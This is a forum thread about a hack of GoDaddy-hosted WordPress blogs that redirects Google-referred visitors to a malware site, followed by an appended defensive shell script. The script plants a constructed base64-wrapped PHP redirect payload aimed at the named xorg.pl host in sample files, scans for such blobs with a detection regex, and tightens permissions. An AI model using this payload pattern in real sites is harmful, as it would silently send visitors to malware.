Massive Number of GoDaddy WordPress Blogs Hacked
A nasty little exploit has hit a large number of GoDaddy-hosted WordPress blogs this weekend. The best part is that the exploit only executes when the traffic is referred by Google, making it the sort of thing that site maintainers won't easily notice. Clever and devious.
Re:I like their commercials (Score:3, Informative)
The redirect leads you to the following URL: http://www2.burnvirusnow34.xorg.pl/
I was redirected to a few 'malwarename'.xorg.pl sites on Saturday when clicking links pointing to wbir.com from CNN. I notified WBIR with several e-mails but they hadn't addressed it as of 11pm last night. CNN pulled the link after 16 hours so I don't know if they just moved on to other stories or acted on the warnings I sent.
I wonder if infected sites should be held accountable for PCs that get infected. Luckily I wasn't running Windows so the Setup_422.exe that downloaded was harmless.
This weekend, or two weeks ago? (Score:5, Informative)
Only php4 users affected (Score:2, Informative)
Well, you're asking for trouble running php4.
It baffles me why people still do it but it also baffles me why people still use Windows. Go figure?
http://www.wpsecuritylock.com/ninoplas-base64-wordpress-hacked-on-godaddy-case-study/
Network Solutions had a similar thing (Score:4, Informative)
happen about a week ago, though I believe they indicated their FTP accounts had been hacked.
http://blog.networksolutions.com/2010/we-feel-your-pain-and-are-working-hard-to-fix-this/
It was annoying, but I just restored from the prior day's backup and went on. I only had one FTP account and a strong password and mine got hit.
We reported this to them on 3/11 (Score:4, Informative)
no mention of google (Score:3, Informative)
This may be referring to the same attack:
http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/
Alt Link (Score:3, Informative)
Re:Don't put any details in the post or anything.. (Score:2, Informative)
Posting a story on Slashdot is almost as bad as having a botnet DoS a site anyway. No exploit needed, just exploits of the common geek.
Sadly nothing new with Wordpress (Score:4, Informative)
I have been dealing with a large number of Wordpress installs in the past 2 years and I am here to tell you this is NOTHING new. This is a very common attack that is being used and it's hard as shit to find. Sometimes they embed it in Javascript, sometimes it's in PHP. Sometimes they encode the PHP or Javascript in base64. Sometimes they have it binary encoded inside image files. They go to great lengths to hide the code.
There are also a large number of free themes out there that come with this crap included. You can typically find it by looking at the footer include file. Look for a large base64 string. Most people ignore those because there are a number of developers who find it amusing to put that crap in their footers so that if removed it will prevent the theme from working. Sure, I understand they want to prevent people from removing their credit, but come on. It's leading to security issues across the board.
The only thing that I have found that helps limit these attacks is to only make the wp-content/uploads directory writable by the webserver. Everything else is owned by the user or root. To take things further, each install is placed inside a unique directory name that is chmod'd to 701 (its parent is also 701). If an attacker manages to crack one install, they can't just attack another by going through the file system.
Not trying to trash Wordpress here, it's just too popular and they have had a number of security mistakes in the past. Wordpress installs require a lot of maintenance to keep up to date. Wordpress makes it easy on attackers by listing the version number right in the damn HTML. Sure, they say that it doesn't matter because people can figure it out anyway. But hey, why not just leave your house unlocked at night. Attackers are just going to get in anyway.
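The two practical points in the comment above, finding a base64-wrapped payload in a theme footer without tripping over a harmless base64 credit string, and the "only uploads is writable, install dir and parent are 701" permission scheme, as an added shell example. This is not code from the commenter, from WordPress or from GoDaddy. It assumes GNU coreutils (`base64 -d`), builds a throwaway sample site in a temp directory with a constructed referrer-conditional redirect (the shape the thread describes, pointing at the xorg.pl host named earlier in the thread), uses a made-up install directory name `k7q2x9`, and assumes an admin has already chgrp'd wp-content/uploads to the web server's group, since chgrp needs privileges the script does not assume.

```shell
#!/bin/sh
# Added example: decode-and-inspect scanner for base64 blobs in PHP/JS files,
# plus the per-install permission lockdown described in the comment above.
set -u

# Tokens that make a decoded blob suspicious. A theme credit string decodes to
# plain text and matches none of these; an injected redirect matches several.
SUSPECT_RE='eval\(|base64_decode|gzinflate|str_rot13|HTTP_REFERER|header\(|Location:|document\.write|xorg\.pl'

# make_sample_site PARENT NAME: constructed sample data, not a real site.
# freebie/footer.php carries an eval(base64_decode()) redirect that only fires
# for Google referrers; clean/footer.php carries a benign base64 credit string.
make_sample_site() {
  parent=$1; name=$2; site=$parent/$name
  mkdir -p "$site/wp-content/themes/freebie" "$site/wp-content/themes/clean" "$site/wp-content/uploads"
  printf '<?php define("DB_PASSWORD", "example-only");\n' > "$site/wp-config.php"
  payload='if(strpos(@$_SERVER["HTTP_REFERER"],"google")!==false){header("Location: http://www2.burnvirusnow34.xorg.pl/");exit;}'
  blob=$(printf '%s' "$payload" | base64 | tr -d '\n')
  printf '<?php eval(base64_decode("%s")); ?>\n<p>Powered by WordPress</p>\n' "$blob" \
    > "$site/wp-content/themes/freebie/footer.php"
  credit=$(printf '%s' 'Theme credit: free theme, please keep this notice in the footer.' | base64 | tr -d '\n')
  printf '<?php echo base64_decode("%s"); ?>\n' "$credit" > "$site/wp-content/themes/clean/footer.php"
}

# scan_base64 DIR: print "file: reason" for every PHP/JS file that either has a
# plaintext eval(base64_decode()) / preg_replace /e wrapper, or contains a long
# base64 run whose DECODED content hits SUSPECT_RE. Looking at the decoded text
# rather than at the blob's length is what keeps a theme credit off the list.
scan_base64() {
  dir=$1
  list=$(mktemp)
  find "$dir" -type f \( -name '*.php' -o -name '*.js' \) > "$list"
  while IFS= read -r f; do
    reason=
    if grep -qE 'eval\(base64_decode\(|preg_replace\([^)]*/e' "$f"; then
      reason='eval(base64_decode()) wrapper in source'
    fi
    # Join lines first so a 76-column-wrapped blob is seen as one run.
    for blob in $(tr -d '\r\n' < "$f" | grep -oE '[A-Za-z0-9+/]{60,}={0,2}' || true); do
      decoded=$(printf '%s' "$blob" | base64 -d 2>/dev/null | tr -d '\000')
      [ -n "$decoded" ] || continue
      hit=$(printf '%s' "$decoded" | grep -aoE "$SUSPECT_RE" | head -n 1 || true)
      if [ -n "$hit" ]; then
        reason="${reason:+$reason; }decoded blob contains '$hit'"
      fi
    done
    [ -n "$reason" ] && printf '%s: %s\n' "$f" "$reason"
  done < "$list"
  rm -f "$list"
}

# lock_down PARENT NAME: files 644, dirs 755, only wp-content/uploads group
# writable (assumes it is already chgrp'd to the web server group), then 701 on
# the install dir and on PARENT so other accounts can traverse but not list.
# PARENT should be the container you keep installs in, not /var/www or /home.
lock_down() {
  parent=$1; name=$2; site=$parent/$name
  find "$site" -type d -exec chmod 755 {} +
  find "$site" -type f -exec chmod 644 {} +
  chmod 775 "$site/wp-content/uploads"
  chmod 701 "$site" "$parent"
}

# Run with "demo" as the first argument to see it on the constructed sample.
if [ "${1:-}" = "demo" ]; then
  root=$(mktemp -d)
  make_sample_site "$root/sites" "k7q2x9"
  scan_base64 "$root/sites/k7q2x9"
  lock_down "$root/sites" "k7q2x9"
  ls -ld "$root/sites/k7q2x9" "$root/sites/k7q2x9/wp-content/uploads"
  rm -rf "$root"
fi
```

Two caveats worth keeping in mind: a regex over base64 runs also matches long hex digests and data URIs, which is why the decoded text is what gets judged; and with this scheme wp-config.php stays world-readable at 644 inside a 701 directory, so the unguessable directory name is the only thing standing between another account on the host and your database password. If the web server runs as your own user (suexec or PHP-as-CGI), tighten wp-config.php to 600.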